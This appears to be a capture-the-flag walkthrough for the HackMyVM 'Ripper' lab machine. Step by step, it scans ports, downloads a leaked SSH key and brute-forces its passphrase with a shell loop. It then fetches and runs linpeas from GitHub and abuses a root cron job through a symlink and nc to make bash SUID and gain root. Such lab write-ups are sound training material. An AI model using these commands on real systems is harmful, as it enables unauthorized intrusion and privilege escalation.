https://hackmyvm.eu/machines/machine.php?vm=Ripper
Scan ports.
nmap -sV -sC -p- 192.168.56.100 -oN ports.log
...
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
...
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Scan port 80.
gobuster dir -u http://192.168.56.100 -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard -o 80.log
===============================================================
/index.html (Status: 200) [Size: 57]
/staff_statements.txt (Status: 200) [Size: 107]
Check staff_statements.txt. Old ssh connection files may mean id_rsa.bak.
cat staff_statements.txt
The site is not yet repaired. Technicians are working on it by connecting with old ssh connection files.
Take care the screen of VM told us the user name jack.
Download id_rsa.bak, try to connect ssh, it's encrypted.
wget http://192.168.56.100/id_rsa.bak
2021-06-03 11:53:15 (126 MB/s) - ‘id_rsa.bak’ saved [1876/1876]
ssh jack@192.168.56.100 -i id_rsa.bak
Enter passphrase for key 'id_rsa.bak':
Use following code to brute force password.
cat /usr/share/wordlists/rock_ascii.txt | while read pass; do if ssh-keygen -c -C “jack@192.168.56.100” -P $pass -f id_rsa.bak &>/dev/null; then echo $pass; break; fi; done
bananas
Login as jack. After some enum, found nothing useful.
Download linpeas from github. Upload to VM.
wget https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh
Run linpeas.sh, get a strange string.
[+] Hashes inside passwd file? ........... No
[+] Writable passwd file? ................ No
[+] Credentials in fstab/mtab? ........... No
[+] Can I read shadow files? ............. No
[+] Can I read opasswd file? ............. jack:Il0V3lipt0n1c3t3a
[+] Can I write in network-scripts? ...... No
[+] Can I read root folder? .............. No
It's the password of another user helder.
Download pspy64 from github(https://github.com/DominicBreuker/pspy), upload to VM, check system process.
2021/06/02 08:22:01 CMD: UID=0 PID=1205 | /usr/sbin/CRON -f
2021/06/02 08:22:01 CMD: UID=0 PID=1206 | /usr/sbin/CRON -f
2021/06/02 08:22:01 CMD: UID=0 PID=1207 | /bin/sh -c nc -vv -q 1 localhost 10000 > /root/.local/out && if [ "$(cat /root/.local/helder.txt)" = "$(cat /home/helder/passwd.txt)" ] ; then chmod +s "/usr/bin/$(cat /root/.local/out)" ; fi
The bash code means, if /root/.local/helder.txt is equal to /home/helder/passwd.txt, then we can send a string (like XXX) to port 10000, and system will set SUID bit of /usr/bin/XXX.
helder@ripper:~$ln -s /root/.local/helder.txt ./passwd.txt
helder@ripper:~$echo bash |nc -nlvp 10000
listening on [any] 10000 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 43374
helder@ripper:~$ls -la /usr/bin/bash
-rwsr-sr-x 1 root root 1168776 Apr 18 2019 /usr/bin/bash
Get root finally.
helder@ripper:~$/usr/bin/bash -p
helder@ripper:~$id
uid=1001(helder) gid=1001(helder) euid=0(root) egid=0(root) groups=0(root),1001(helder)
